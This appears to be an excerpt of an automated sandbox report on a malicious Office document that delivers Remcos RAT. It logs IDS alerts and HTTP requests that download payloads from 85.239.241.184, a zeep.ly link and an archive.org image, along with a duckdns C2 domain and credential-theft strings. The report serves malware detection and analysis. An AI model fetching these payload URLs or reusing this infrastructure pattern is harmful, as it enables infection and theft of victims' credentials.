                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169

                    Networking

                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.239.241.184:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.239.241.184:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49170
                    Source: Malware configuration extractorURLs: dremom2.duckdns.org
                    Source: unknownDNS query: name: dremom2.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.89.247.65:2201
                    Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/RMHC.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 45.89.247.65 45.89.247.65
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49174 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B411
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E4E4163-9857-4919-BB2D-E3650AD0FCC0}.tmp
                    Source: global traffic | HTTP traffic detected:
                        GET /rXgoN HTTP/1.1
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: zeep.ly
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                        Host: ia601706.us.archive.org
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: 85.239.241.184
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 85.239.241.184
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /50/RMHC.txt HTTP/1.1
                        Host: 85.239.241.184
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global traffic | DNS traffic detected: DNS query: zeep.ly
                    Source: global traffic | DNS traffic detected: DNS query: ia601706.us.archive.org
                    Source: global traffic | DNS traffic detected: DNS query: dremom2.duckdns.org
                    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://85.239.241.184
                    Source: powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://85.239.241.184/50/RMHC.txt
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIF
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFj
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFm
                    Source: gvt on 85.239.241.184.url.0.dr | String found in binary or memory: http://85.239.241.184/50/gvt/
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhv71A7.tmp.13.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
